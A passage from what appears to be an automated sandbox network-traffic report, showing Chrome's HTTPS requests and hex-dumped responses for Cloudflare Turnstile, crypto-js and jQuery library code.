72 3d 64 6f 63
                                                                Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                                2025-01-07 21:36:02 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                                Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.1649728104.17.25.144437780C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-07 21:36:02 UTC386OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                Host: cdnjs.cloudflare.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-07 21:36:03 UTC963INHTTP/1.1 200 OK
                                                                Date: Tue, 07 Jan 2025 21:36:03 GMT
                                                                Content-Type: application/javascript; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                Cache-Control: public, max-age=30672000
                                                                ETag: W/"61182885-40eb"
                                                                Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                cf-cdnjs-via: cfworker/kv
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                Timing-Allow-Origin: *
                                                                X-Content-Type-Options: nosniff
                                                                CF-Cache-Status: HIT
                                                                Age: 1151511
                                                                Expires: Sun, 28 Dec 2025 21:36:03 GMT
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ucT6L5lTnD2gXtPTdk%2BLZDYUb%2FngEcTO%2FFkpeXO8kyR4RfgLpCrtqd7KCavxvDayw%2Bg6hqCX8XpB2wjKL8e%2FB9uGmS5x2OPSvZJuAUU3sHHvTrNrJdhYVpAyYyEQnuJ8Xd9RtDxn"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                Strict-Transport-Security: max-age=15780000
                                                                Server: cloudflare
                                                                CF-RAY: 8fe714c33e2d43d5-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-07 21:36:03 UTC406INData Raw: 37 62 65 65 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                Data Ascii: 7bee!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                2025-01-07 21:36:03 UTC1369INData Raw: 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74
                                                                Data Ascii: ypeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object
                                                                2025-01-07 21:36:03 UTC1369INData Raw: 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42
                                                                Data Ascii: one.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomB
                                                                2025-01-07 21:36:03 UTC1369INData Raw: 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30
                                                                Data Ascii: ==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0
                                                                2025-01-07 21:36:03 UTC1369INData Raw: 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33
                                                                Data Ascii: for(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3
                                                                2025-01-07 21:36:03 UTC1369INData Raw: 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36
                                                                Data Ascii: 1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16
                                                                2025-01-07 21:36:03 UTC1369INData Raw: 75 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69
                                                                Data Ascii: uffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringi
                                                                2025-01-07 21:36:03 UTC1369INData Raw: 3d 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c
                                                                Data Ascii: =r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKL
                                                                2025-01-07 21:36:03 UTC1369INData Raw: 61 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f
                                                                Data Ascii: abs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o
                                                                2025-01-07 21:36:03 UTC1369INData Raw: 5b 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c
                                                                Data Ascii: [39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.1649729151.101.66.1374437780C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-07 21:36:02 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                Host: code.jquery.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-07 21:36:03 UTC613INHTTP/1.1 200 OK
                                                                Connection: close
                                                                Content-Length: 89501
                                                                Server: nginx
                                                                Content-Type: application/javascript; charset=utf-8
                                                                Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                ETag: "28feccc0-15d9d"
                                                                Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                Access-Control-Allow-Origin: *
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                Via: 1.1 varnish, 1.1 varnish
                                                                Accept-Ranges: bytes
                                                                Date: Tue, 07 Jan 2025 21:36:03 GMT
                                                                Age: 1770289
                                                                X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740043-EWR
                                                                X-Cache: HIT, HIT
                                                                X-Cache-Hits: 2774, 1
                                                                X-Timer: S1736285763.049929,VS0,VE1
                                                                Vary: Accept-Encoding
                                                                2025-01-07 21:36:03 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                2025-01-07 21:36:03 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                2025-01-07 21:36:03 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                2025-01-07 21:36:03 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                2025-01-07 21:36:03 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
